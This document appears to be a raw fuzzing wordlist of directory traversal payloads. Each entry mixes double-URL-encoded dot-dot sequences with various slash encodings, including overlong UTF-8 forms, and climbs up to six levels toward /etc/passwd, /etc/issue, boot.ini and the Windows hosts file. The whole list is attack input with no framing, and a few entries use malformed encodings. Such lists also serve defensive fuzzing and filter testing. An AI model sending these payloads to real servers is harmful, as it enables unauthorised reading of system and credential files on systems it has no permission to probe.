-%252e%252e%2f%252e%252e%2fetc%2fpasswd -%252e%252e%2f%252e%252e%2fetc%2fissue -%252e%252e%2f%252e%252e%2fboot.ini -%252e%252e%2f%252e%252e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%252e%252e%2f%252e%252e%2f%252e%252e%2fetc%2fpasswd -%252e%252e%2f%252e%252e%2f%252e%252e%2fetc%2fissue -%252e%252e%2f%252e%252e%2f%252e%252e%2fboot.ini -%252e%252e%2f%252e%252e%2f%252e%252e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fetc%2fpasswd -%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fetc%2fissue -%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fboot.ini -%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fetc%2fpasswd -%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fetc%2fissue -%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fboot.ini -%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fetc%2fpasswd -%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fetc%2fissue -%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fboot.ini -%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%252e%252e%5cetc%5cpasswd -%252e%252e%5cetc%5cissue -%252e%252e%5cboot.ini -%252e%252e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%252e%252e%5c%252e%252e%5cetc%5cpasswd -%252e%252e%5c%252e%252e%5cetc%5cissue -%252e%252e%5c%252e%252e%5cboot.ini -%252e%252e%5c%252e%252e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%252e%252e%5c%252e%252e%5c%252e%252e%5cetc%5cpasswd -%252e%252e%5c%252e%252e%5c%252e%252e%5cetc%5cissue -%252e%252e%5c%252e%252e%5c%252e%252e%5cboot.ini -%252e%252e%5c%252e%252e%5c%252e%252e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5cetc%5cpasswd -%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5cetc%5cissue -%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5cboot.ini -%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5cetc%5cpasswd -%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5cetc%5cissue -%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5cboot.ini -%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5cetc%5cpasswd -%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5cetc%5cissue -%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5cboot.ini -%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%252e%252e0x2fetc0x2fpasswd -%252e%252e0x2fetc0x2fissue -%252e%252e0x2fboot.ini -%252e%252e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%252e%252e0x2f%252e%252e0x2fetc0x2fpasswd -%252e%252e0x2f%252e%252e0x2fetc0x2fissue -%252e%252e0x2f%252e%252e0x2fboot.ini -%252e%252e0x2f%252e%252e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%252e%252e0x2f%252e%252e0x2f%252e%252e0x2fetc0x2fpasswd -%252e%252e0x2f%252e%252e0x2f%252e%252e0x2fetc0x2fissue -%252e%252e0x2f%252e%252e0x2f%252e%252e0x2fboot.ini -%252e%252e0x2f%252e%252e0x2f%252e%252e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2fetc0x2fpasswd -%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2fetc0x2fissue -%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2fboot.ini -%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2fetc0x2fpasswd -%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2fetc0x2fissue -%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2fboot.ini -%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2fetc0x2fpasswd -%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2fetc0x2fissue -%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2fboot.ini -%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2f%252e%252e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%252e%252e0x5cetc0x5cpasswd -%252e%252e0x5cetc0x5cissue -%252e%252e0x5cboot.ini -%252e%252e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%252e%252e0x5c%252e%252e0x5cetc0x5cpasswd -%252e%252e0x5c%252e%252e0x5cetc0x5cissue -%252e%252e0x5c%252e%252e0x5cboot.ini -%252e%252e0x5c%252e%252e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%252e%252e0x5c%252e%252e0x5c%252e%252e0x5cetc0x5cpasswd -%252e%252e0x5c%252e%252e0x5c%252e%252e0x5cetc0x5cissue -%252e%252e0x5c%252e%252e0x5c%252e%252e0x5cboot.ini -%252e%252e0x5c%252e%252e0x5c%252e%252e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5cetc0x5cpasswd -%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5cetc0x5cissue -%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5cboot.ini -%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5cetc0x5cpasswd -%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5cetc0x5cissue -%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5cboot.ini -%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5cetc0x5cpasswd -%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5cetc0x5cissue -%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5cboot.ini -%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5c%252e%252e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%252e%252e%252fetc%252fpasswd -%252e%252e%252fetc%252fissue -%252e%252e%252fboot.ini -%252e%252e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%252e%252e%252f%252e%252e%252fetc%252fpasswd -%252e%252e%252f%252e%252e%252fetc%252fissue -%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd -%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fissue -%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fissue -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fissue -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fissue -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%252e%252e%255cetc%255cpasswd -%252e%252e%255cetc%255cissue -%252e%252e%255cboot.ini -%252e%252e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%252e%252e%255c%252e%252e%255cetc%255cpasswd -%252e%252e%255c%252e%252e%255cetc%255cissue -%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%252e%252e%255c%252e%252e%255c%252e%252e%255cetc%255cpasswd -%252e%252e%255c%252e%252e%255c%252e%252e%255cetc%255cissue -%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cetc%255cpasswd -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cetc%255cissue -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cetc%255cpasswd -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cetc%255cissue -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cetc%255cpasswd -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cetc%255cissue -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%252e%252e%c0%2fetc%c0%2fpasswd -%252e%252e%c0%2fetc%c0%2fissue -%252e%252e%c0%2fboot.ini -%252e%252e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%252e%252e%c0%2f%252e%252e%c0%2fetc%c0%2fpasswd -%252e%252e%c0%2f%252e%252e%c0%2fetc%c0%2fissue -%252e%252e%c0%2f%252e%252e%c0%2fboot.ini -%252e%252e%c0%2f%252e%252e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2fetc%c0%2fpasswd -%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2fetc%c0%2fissue -%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2fboot.ini -%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2fetc%c0%2fpasswd -%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2fetc%c0%2fissue -%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2fboot.ini -%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2fetc%c0%2fpasswd -%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2fetc%c0%2fissue -%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2fboot.ini -%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2fetc%c0%2fpasswd -%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2fetc%c0%2fissue -%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2fboot.ini -%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%252e%252e%c0%afetc%c0%afpasswd -%252e%252e%c0%afetc%c0%afissue -%252e%252e%c0%afboot.ini -%252e%252e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%252e%252e%c0%af%252e%252e%c0%afetc%c0%afpasswd -%252e%252e%c0%af%252e%252e%c0%afetc%c0%afissue -%252e%252e%c0%af%252e%252e%c0%afboot.ini -%252e%252e%c0%af%252e%252e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%afetc%c0%afpasswd -%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%afetc%c0%afissue -%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%afboot.ini -%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%afetc%c0%afpasswd -%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%afetc%c0%afissue -%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%afboot.ini -%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%afetc%c0%afpasswd -%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%afetc%c0%afissue -%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%afboot.ini -%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%afetc%c0%afpasswd -%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%afetc%c0%afissue -%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%afboot.ini -%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%af%252e%252e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%252e%252e%c0%5cetc%c0%5cpasswd -%252e%252e%c0%5cetc%c0%5cissue -%252e%252e%c0%5cboot.ini -%252e%252e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%252e%252e%c0%5c%252e%252e%c0%5cetc%c0%5cpasswd -%252e%252e%c0%5c%252e%252e%c0%5cetc%c0%5cissue -%252e%252e%c0%5c%252e%252e%c0%5cboot.ini -%252e%252e%c0%5c%252e%252e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5cetc%c0%5cpasswd -%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5cetc%c0%5cissue -%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5cboot.ini -%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5cetc%c0%5cpasswd -%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5cetc%c0%5cissue -%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5cboot.ini -%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5cetc%c0%5cpasswd -%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5cetc%c0%5cissue -%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5cboot.ini -%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5cetc%c0%5cpasswd -%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5cetc%c0%5cissue -%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5cboot.ini -%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5c%252e%252e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%252e%252e%c1%9cetc%c1%9cpasswd -%252e%252e%c1%9cetc%c1%9cissue -%252e%252e%c1%9cboot.ini -%252e%252e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%252e%252e%c1%9c%252e%252e%c1%9cetc%c1%9cpasswd -%252e%252e%c1%9c%252e%252e%c1%9cetc%c1%9cissue -%252e%252e%c1%9c%252e%252e%c1%9cboot.ini -%252e%252e%c1%9c%252e%252e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9cetc%c1%9cpasswd -%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9cetc%c1%9cissue -%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9cboot.ini -%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9cetc%c1%9cpasswd -%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9cetc%c1%9cissue -%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9cboot.ini -%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9cetc%c1%9cpasswd -%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9cetc%c1%9cissue -%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9cboot.ini -%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9cetc%c1%9cpasswd -%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9cetc%c1%9cissue -%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9cboot.ini -%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9c%252e%252e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%252e%252e%c1%pcetc%c1%pcpasswd -%252e%252e%c1%pcetc%c1%pcissue -%252e%252e%c1%pcboot.ini -%252e%252e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%252e%252e%c1%pc%252e%252e%c1%pcetc%c1%pcpasswd -%252e%252e%c1%pc%252e%252e%c1%pcetc%c1%pcissue -%252e%252e%c1%pc%252e%252e%c1%pcboot.ini -%252e%252e%c1%pc%252e%252e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pcetc%c1%pcpasswd -%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pcetc%c1%pcissue -%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pcboot.ini -%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pcetc%c1%pcpasswd -%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pcetc%c1%pcissue -%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pcboot.ini -%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pcetc%c1%pcpasswd -%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pcetc%c1%pcissue -%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pcboot.ini -%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pcetc%c1%pcpasswd -%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pcetc%c1%pcissue -%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pcboot.ini -%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pc%252e%252e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%252e%252e%c0%9vetc%c0%9vpasswd -%252e%252e%c0%9vetc%c0%9vissue -%252e%252e%c0%9vboot.ini -%252e%252e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%252e%252e%c0%9v%252e%252e%c0%9vetc%c0%9vpasswd -%252e%252e%c0%9v%252e%252e%c0%9vetc%c0%9vissue -%252e%252e%c0%9v%252e%252e%c0%9vboot.ini -%252e%252e%c0%9v%252e%252e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9vetc%c0%9vpasswd -%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9vetc%c0%9vissue -%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9vboot.ini -%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9vetc%c0%9vpasswd -%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9vetc%c0%9vissue -%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9vboot.ini -%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9vetc%c0%9vpasswd -%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9vetc%c0%9vissue -%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9vboot.ini -%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9vetc%c0%9vpasswd -%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9vetc%c0%9vissue -%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9v%252e%252e%c0%9vboot.ini 